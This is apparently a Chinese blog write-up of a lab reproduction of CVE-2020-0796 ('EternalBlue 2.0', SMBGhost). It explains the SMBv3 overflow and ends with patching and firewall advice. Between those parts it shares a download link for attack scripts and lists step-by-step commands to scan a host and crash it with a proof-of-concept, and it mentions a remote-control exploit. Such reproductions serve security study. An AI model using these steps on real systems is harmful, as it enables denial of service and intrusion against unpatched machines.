当前位置: 首页 > article >正文

CVE-2020-0796永恒之蓝2.0(漏洞复现)

目录

前言

产生原因

影响范围

漏洞复现

复现环境

复现步骤

防御措施

总结


前言

在网络安全的战场上,漏洞一直是攻防双方关注的焦点。CVE-2020-0796,这个被称为 “永恒之蓝 2.0” 的漏洞,一度引起了广泛的关注与担忧。它究竟是怎样的一个漏洞,又会对我们的系统产生怎样的威胁?本文将深入探讨这个漏洞,并进行漏洞复现,同时为大家提供有效的防御措施。

产生原因

这个漏洞的产生主要源于 Windows 对 SMBv3 协议处理中的缺陷。当 SMBv3 协议处理某些特制的压缩数据包时,存在缓冲区溢出的问题。Windows 系统在解析这些数据包时,没有对数据包的长度和内容进行严格的边界检查,从而导致攻击者可以精心构造恶意数据包,使得系统在处理这些数据包时发生缓冲区溢出,进而执行攻击者预先植入的恶意代码。

影响范围

该漏洞影响众多基于 Windows 的操作系统,包括但不限于:

  • Windows Server 2019
  • Windows 10 Version 1903、1909 等较新版本

微软官方也发布了相关安全公告,建议用户尽快进行更新以修复此漏洞。

漏洞复现

通过网盘分享的文件:永恒之蓝攻击脚本
链接: https://pan.baidu.com/s/1ZtQEMg2nBtn6VZtfg6_k1g?pwd=5c6r 提取码: 5c6r 
--来自百度网盘超级会员v3的分享

复现环境

  • 攻击机:Kali Linux    
  • 目标机:Windows 10(未安装相关安全补丁)

复现步骤

使用的命令

nmap -p 445 --script=smb-protocols <目标IP>    #使用Nmap对目标网络进行扫描
unzip CVE-2020-0796.zip                        #解压攻击压缩包
cd CVE-2020-0796                               #进入到解压的文件夹
cd SMBGhost                                    #切换到漏洞检测目录
python3 scanner.py 10.0.0.103                  #使用python3脚本进行检测目标ip地址是否有此漏洞
cd ../CVE-2020-0796-PoC                        #切换到攻击脚本目录
python3 CVE-2020-0796.py 10.0.0.103            #使用python3进行攻击

     1.上传永恒之蓝攻击脚本,并进行解压

  2.解压后切换到解压后的路径中,并查看文件夹下的内容

drwxrwxrwx 4 root root 4096 2024年 6月29日  CVE-2020-0796-PoC  #蓝屏攻击脚本
drwxrwxrwx 2 root root 4096 2024年 6月29日  SMBGhost           #扫描脚本
drwxrwxrwx 2 root root 4096 2024年 6月29日  SMBGhost_RCE_PoC   #远程控制攻击脚本

 3.切换进入扫描脚本文件夹,使用python3运行扫描脚本,扫描目标主机是否存在此漏洞

 4.切换进入攻击脚本,此时利用脚本进行攻击

 5.此时查看目标靶机已经蓝屏

至此,CVE-2020-0796漏洞复现结束。

防御措施

及时更新系统:安装微软发布的安全补丁是最有效的防御手段。用户应定期检查系统更新,并及时安装。

网络隔离:对不同安全级别的网络进行隔离,限制 SMBv3 协议的访问范围,减少攻击面。

启用防火墙:配置防火墙规则,阻止未经授权的 SMBv3 连接请求。可以只允许特定的 IP 地址或网络段访问 SMB 服务。

总结

CVE-2020-0796“永恒之蓝 2.0” 漏洞再次给我们敲响了网络安全的警钟。了解漏洞的原理、影响范围和防御措施,有助于我们更好地保护自己的系统安全。在日常运维中,要养成及时更新系统、加强网络安全防护的好习惯,共同营造一个安全的网络环境。


http://www.kler.cn/a/522476.html

相关文章:

  • 2024年记 | 凛冬将至
  • 2025-01-28 - 通用人工智能技术 - RAG - 本地安装 DeepSeek-R1对话系统 - 流雨声
  • 《哈佛家训》
  • 深入探讨数据库索引类型:B-tree、Hash、GIN与GiST的对比与应用
  • fpga系列 HDL:XILINX Vivado Vitis 高层次综合(HLS) 实现 EBAZ板LED控制(上)
  • MySQL误删数据怎么办?
  • 智慧校园在职业学校的实施与展望
  • 动态规划——斜率优化DP
  • 力扣111二叉树的最小深度(DFS)
  • three.js+WebGL踩坑经验合集(4.2):为什么不在可视范围内的3D点投影到2D的结果这么不可靠
  • 改进候鸟优化算法之三:引入自适应策略的候鸟优化算法(AS-MBO)
  • powershell和linux各自一个简单易懂的小demo, to be modified.
  • 某公交管理系统简易逻辑漏洞+SQL注入挖掘
  • java求职学习day18
  • echo ‘export PATH=/usr/local/bin:$PATH‘ >> ~/.bashrc这个和直接添加到/etc/profile有什么区别
  • 2025美国大学生数学建模竞赛美赛E题成品参考论文(48页)(含模型,可运行代码,求解结果)
  • 代码随想录算法训练营第三十七天-动态规划-完全背包-377. 组合总和 Ⅳ
  • 使用 PyTorch 实现逻辑回归:从数据到模型保存与加载
  • 家政预约小程序11分类展示
  • 【Elasticsearch】doc_values
  • UDP/TCP ④-延时应答 || 捎带应答 || 粘包问题 || 异常处理
  • pycharm光标变成白格子 黑格子
  • 第05章 08 绘制脑部体绘制图的阈值等值面
  • Node.js 全局对象
  • web前端11--伪类与过渡
  • 循环神经网络(RNN)+pytorch实现情感分析